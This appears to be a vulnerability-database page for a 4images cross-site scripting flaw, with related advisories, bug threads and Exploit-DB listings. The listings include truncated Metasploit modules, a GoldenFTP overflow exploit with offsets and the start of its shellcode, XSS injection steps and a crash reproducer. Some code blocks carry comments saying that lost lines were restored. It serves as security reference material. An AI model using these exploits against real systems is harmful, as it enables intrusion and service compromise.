CVE-2006-2011
Published 2006-04-25
Priority: P4 (low) · CVSS 2.0 score: 2.6 · Vector: AV:N/AC:H/Au:N/C:N/I:P/A:N
EPSS: 1.34% (67.8th percentile)
Cross-site scripting (XSS) vulnerability in member.php in 4images 1.7 and earlier allows remote attackers to inject arbitrary web script or HTML via the nickname, probably involving the user_name parameter in register.php.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| 4homepages | 4images | — | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 2.6 | LOW | AV:N/AC:H/Au:N/C:N/I:P/A:N |
| vendor_redhat | — | 7.5 | HIGH | — |
GHSA
CVE-2006-2011 [LOW] GHSA-cqjg-ppxj-v4xr: Cross-site scripting (XSS) vulnerability in member
ghsa_unreviewed · 2022-05-01
Red Hat
CVE-2011-2895 [HIGH] BSD compress LZW decoder buffer overflow
vendor_redhat · 2011-08-10 · CVSS 7.5
The LZW decompressor in (1) the BufCompressedFill function in fontfile/decompress.c in X.Org libXfont before 1.4.4 and (2) compress/compress.c in 4.3BSD, as used in zopen.c in OpenBSD before 3.8, FreeBSD, NetBSD 4.0.x and 5.0.x before 5.0.3 and 5.1.x before 5.1.1, FreeType 2.1.9, and other products, does not properly handle code words that are absent from the decompression table when encountered, which allows context-dependent attackers to trigger an infinite loop or a heap-based buffer overflow, and possibly execute arbitrary code, via a crafted compressed stream, a related issue to CVE-2006-1168 and CVE-2011-2896.
Package: busybox (Red Hat Enterprise Linux 4) - Not affected
Package: gzip (Red Hat Enterprise Linux 4) - Not affected
Package: mai
Red Hat
CVE-2011-2896 [HIGH] David Koblas' GIF decoder LZW decoder buffer overflow
vendor_redhat · 2011-08-10 · CVSS 7.5
The LZW decompressor in the LWZReadByte function in giftoppm.c in the David Koblas GIF decoder in PBMPLUS, as used in the gif_read_lzw function in filter/image-gif.c in CUPS before 1.4.7, the LZWReadByte function in plug-ins/common/file-gif-load.c in GIMP 2.6.11 and earlier, the LZWReadByte function in img/gifread.c in XPCE in SWI-Prolog 5.10.4 and earlier, and other products, does not properly handle code words that are absent from the decompression table when encountered, which allows remote attackers to trigger an infinite loop or a heap-based buffer overflow, and possibly execute arbitrary code, via a crafted compressed stream, a related issue to CVE-2006-1168 and CVE-2011-2895.
Statement: Vulnerable. This issue affects the versio
Red Hat
CVE-2011-0752 [HIGH] php: extract() can overwrite $GLOBALS and $this when using EXTR_OVERWRITE
vendor_redhat · 2010-12-08 · CVSS 7.5
The extract function in PHP before 5.2.15 does not prevent use of the EXTR_OVERWRITE parameter to overwrite (1) the GLOBALS superglobal array and (2) the this variable, which allows context-dependent attackers to bypass intended access restrictions by modifying data structures that were not intended to depend on external input, a related issue to CVE-2005-2691 and CVE-2006-3758.
Statement: We do not consider this flaw to be a security issue as it is only exploitable by the script author. No trust boundary is crossed.
This issue did not affect the versions of PHP as shipped with Red Hat Enterprise Linux 3, 4, or 5 (php). This issue was addressed in the php53 packages as shipped in Red Hat Enterprise Linux 5 before t
No detection rules found.
Exploit-DB
CVE-2011-5033 CSF Firewall - Buffer Overflow (PoC)
exploitdb · 2011-12-09
```c
/*
############################################################################
# Exploit Title: CSF Firewall Buffer overflow p0c
# DownLoaD : http://www.configserver.com/free/csf.tgz
# Date: 2011-12-09
# Author: FoX HaCkEr
# site : www.sec4ever.com
# MaiL : [email protected]
# Tested on: CentOS3/4
############################################################################
FiLe : CSF.c
*/
/*
* Copyright 2006-2011, Way to the Web Limited
* URL: http://www.configserver.com
* Email: [email protected]
*/
/* The header names were stripped during extraction (angle brackets lost);
 * restored here from the calls the visible code makes. */
#include <stdio.h>      /* FILE, fopen */
#include <stdlib.h>
#include <unistd.h>     /* getuid */
#include <pwd.h>        /* getpwuid, struct passwd */
#include <sys/types.h>  /* uid_t */

int main(void)
{
    FILE *adminFile;
    uid_t ruid;
    char name[100];
    struct passwd *pw;
    int admin = 0;

    ruid = getuid();
    pw = getpwuid(ruid);
    adminFile = fopen("/usr/local/directadmin/data/admin/admin.list", "r");
    wh
    /* listing truncated at this point in the source */
```
Exploit-DB
CVE-2006-2369 [HIGH] RealVNC - Authentication Bypass (Metasploit)
exploitdb · 2011-08-26 · CVSS 7.5
```ruby
##
# $Id: realvnc_41_bypass.rb 13641 2011-08-26 04:40:21Z bannedit $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

# The class declaration and initialize() header were lost in extraction;
# restored here from the standard Metasploit 3 module skeleton.
class Metasploit3 < Msf::Auxiliary
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'RealVNC Authentication Bypass',
      'Description' => %q{
        This module exploits an Authentication Bypass Vulnerability
        in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy
        listener on LPORT and proxies to the target server
        The AUTOVNC option requires that vncviewer be installed on
        the attacking machine. This option should be disabled for Pro
      },
      'Author' =>
        [
          'hdm', # origin
          # listing truncated at this point in the source
```
Exploit-DB
BlogPHP 2.0 - Persistent Cross-Site Scripting
exploitdb · 2011-08-09
# Exploit Title: BlogPHP v2 - XSS
# Google Dork: "Copyright ©2006 Powered by www.blogphp.net"
# Date: 09/08/2011
# Author: Paul Maaouchy( Paulzz )
# Software Link: http://sourceforge.net/projects/blogphpscript/files/blogphpscript/2.0/BlogPHPv2.zip/download
# Version: v2
# Tested on:
# CVE :
How to exploit:
1- Go there: http://localhost/blogphp/register.html.
2- Put the XSS code in the Username field. Example: .
3- Put anything in the other fields (Password & E-mail).
4- Now anyone who goes there: http://localhost/blogphp/members.html will be redirected to google.com OR your XSS code will be executed.
Paul Maaouchy ( Paulzz )
Contact me
@ [email protected]
@ [email protected]
@ [email protected]
Exploit-DB
CVE-2006-3918 [MEDIUM] Oracle HTTP Server - Cross-Site Scripting Header Injection
exploitdb · 2011-06-13 · CVSS 4.3
Oracle HTTP Server XSS Header Injection
# Attack Pattern ID : CAPEC-86
# CWE ID : CI-79
# OWASP IDs : A1-Injections, A2-Cross Site Scripting (XSS)
# CVE ID : not yet
# Related CVEs : CVE-2006-3918, CVE-2007-0275
# A.K.A : Unfiltered Header Injection
# Product Type : Application
# Vendor : Oracle Corporation
# Product : Oracle HTTP Server for Oracle Application Server 10g
# Vulnerable Versions: 10.1.2.0.2
# Probably Vulnerable: (not tested) 10.1.2.0.0, 9.0.4.3.0, 9.0.4.2.0, 9.0.4.1.0, 9.0.4.0.0
# Severity : Medium
# Tested on : Linux, Windows Server 2003
# Download link : http://www.oracle.com/technetwork/middleware/ias/downloads/101201se-090616.html
# Date : 12/06/2011
# Google Dork : allintitle:"Oracle HTTP Server -"
[-] Cre
Exploit-DB
CVE-2006-6576 Golden FTP Server 4.70 - PASS Stack Buffer Overflow (Metasploit)
exploitdb · 2011-06-02
```ruby
##
# $Id: goldenftp_pass_bof.rb 12812 2011-06-02 01:10:22Z bannedit $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

# The class declaration and initialize() header were lost in extraction;
# restored here from the standard Metasploit 3 exploit module skeleton.
class Metasploit3 < Msf::Exploit::Remote
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'GoldenFTP PASS Stack Buffer Overflow',
      'Description' => %q{
        This module exploits a vulnerability in the Golden
        FTP service. This module uses the PASS command to trigger the overflow.
      },
      'Author'      => [ 'bannedit' ],
      'License'     => MSF_LICENSE,
      'Version'     => '$Revision: 12812 $',
      'References'  =>
        [
          [ 'BID', '45957' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/16
          # listing truncated at this point in the source
```
Exploit-DB
CVE-2006-6184 Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Long Filename Overflow (Metasploit)
exploitdb · 2011-03-05
```ruby
##
# $Id: attftp_long_filename.rb 11882 2011-03-05 21:00:57Z bannedit $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

# The class declaration and initialize() header were lost in extraction;
# restored here from the standard Metasploit 3 exploit module skeleton.
class Metasploit3 < Msf::Exploit::Remote
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Allied Telesyn TFTP Server 1.9 Long Filename Overflow',
      'Description' => %q{
        This module exploits a stack buffer overflow in AT-TFTP v1.9, by sending a
        request (get/write) for an overly long file name.
      },
      'Author'      => [ 'Patrick Webster' ],
      'Version'     => '$Revision: 11882 $',
      'References'  =>
        [
          ['CVE', '2006-6184'],
          ['OSVDB', '11350'],
          # listing truncated at this point in the source
```
Exploit-DB
CVE-2006-2961 CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (2)
exploitdb · 2011-02-23
```ruby
##
# $Id: cesarftp_mkd.rb 11799 2011-02-23 00:58:54Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

# The class declaration and initialize() header were lost in extraction;
# restored here from the standard Metasploit 3 exploit module skeleton.
class Metasploit3 < Msf::Exploit::Remote
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Cesar FTP 0.99g MKD Command Buffer Overflow',
      'Description' => %q{
        This module exploits a stack buffer overflow in the MKD verb in CesarFTP 0.99g.
        You must have valid credentials to trigger this vulnerability. Also, you
        only get one chance, so choose your target carefully.
      },
      'Author'      => 'MC',
      'License'     => MSF_LICENSE,
      'Version'     => '$Revision: 11799 $',
      'References'  =>
        # listing truncated at this point in the source
```
Exploit-DB
CVE-2006-3439 Microsoft Server Service - NetpwPathCanonicalize Overflow (MS06-040) (Metasploit)
exploitdb · 2011-02-17
```ruby
##
# $Id: ms06_040_netapi.rb 11762 2011-02-17 03:56:15Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

# The class declaration and initialize() header were lost in extraction;
# restored here from the standard Metasploit 3 exploit module skeleton.
class Metasploit3 < Msf::Exploit::Remote
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Microsoft Server Service NetpwPathCanonicalize Overflow',
      'Description' => %q{
        This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function
        using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that
        other RPC calls could be used to exploit this service. This exploit will result in
        a denial of
        # listing truncated at this point in the source
```
Exploit-DB
CVE-2006-6576 Golden FTP Server 4.70 - 'PASS' Buffer Overflow
exploitdb · 2011-01-23
```ruby
# GoldenFTP 4.70 PASS Exploit
# Authors: Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)
# Tested on XP SP3
# Vendor Contacted: 1/17/2011 (no response)
# For this exploit to work correctly, you need to know the subnet that the server
# is running on. You also need to make sure that "show new connections" is checked in the options.
# The total length of the buffer should be 4 bytes less than the offset, with EIP at the end.
# 528 is the offset when server running on 192.168.236.0
# 533 is the offset when server running on 10.0.1.0
# 530 is the offset when server running on 192.168.1.0
# 531 is the offset when server running on 172.16.1.0
require 'net/ftp'

# Metasploit bind shell port=4444 | shikata_ga_nai | 369 bytes
shellcode = ("\
# listing truncated at this point in the source
```
Bugzilla
CVE-2011-4082 [HIGH] phpldapadmin: local file inclusion flaw fixed in 0.9.8 [epel-4]
bugzilla · 2011-10-27 · CVSS 7.5
epel-4 tracking bug for phpldapadmin: see blocks bug list for full details of the security issue(s).
This bug is never intended to be made public, please put any public notes
in the 'blocks' bugs.
[bug automatically created by: add-tracking-bugs]
Discussion:
The bug was fixed upstream in 0.9.7.
EPEL4 has had 0.9.8.3 for at least several years.
Moreover, the first phpldapadmin version that appeared in Fedora at all was 0.9.7.
What is the reason for this bug ticket?
---
Sorry, surely fixed in 0.9.8.
Anyway, 0.9.8.x should have been in EPEL4 since 2006 ...
---
The report indicates it was fixed in 0.9.8.5, and we have 0.9.8.3 in EPEL4, so I don't believe it is fixed in EPEL4.
---
> The report indicates it was fixed in 0.9.8
Bugzilla
CVE-2006-1168 [HIGH] busybox: uncompress buffer underflow
bugzilla · 2011-08-05 · CVSS 7.5
Description of problem:
busybox embeds (n)compress code in its libunarchive/libarchive. This embedded copy has not been patched for the following bug:
https://bugs.gentoo.org/show_bug.cgi?id=141728
http://ncompress.git.sourceforge.net/git/gitweb.cgi?p=ncompress/ncompress;a=commitdiff;h=e21aad4a5a3ba0b6c2279b28a80f85b0b226a175
Steps to Reproduce:
```shell
$ perl -e 'print "\x1f\x9d\x90","\x01"x"2048"' | busybox uncompress
Segmentation fault
```
Discussion:
bss or heap, depending on the version, it seems.
---
Fixed in upstream git:
commit 251fc70e9722f931eec23a34030d05ba5f747b0e
Author: Denys Vlasenko
Date: Thu Aug 18 14:29:41 2011 +0200
uncompress: fix buffer underrun by corrupted input
Fix for the latest release:
http://busybox.net/download
Bugzilla
CVE-2006-7244 [MEDIUM] libpng10, libpng: Memory leak by write of iCCP chunk with negative embedded profile length (CVE-2006-7244, CVE-2009-5063)
bugzilla · 2011-03-23 · CVSS 5.0
A memory leak was found in the way libpng, PNG image format files
manipulating library, processed image files with negative length
of embedded International Color Consortium (ICC) profile chunk.
A remote attacker could provide a specially-crafted JPEG image
format file and trick the local user into opening it with an
application linked against libpng, which would result in
denial of service (excessive memory consumption or that particular
application crash).
References:
[1] http://www.openwall.com/lists/oss-security/2011/03/22/7 (CVE Request)
Discussion:
As noted in [1]:
i), the bug was introduced in 1.2.13beta1:
http://libpng.git.sourceforge.net/git/gitweb.cgi?p=l
References
- http://secunia.com/advisories/19745
- http://www.osvdb.org/24796
- http://www.securityfocus.com/archive/1/431599/100/0/threaded
- http://www.securityfocus.com/bid/17625
- http://www.vupen.com/english/advisories/2006/1449
- https://exchange.xforce.ibmcloud.com/vulnerabilities/25987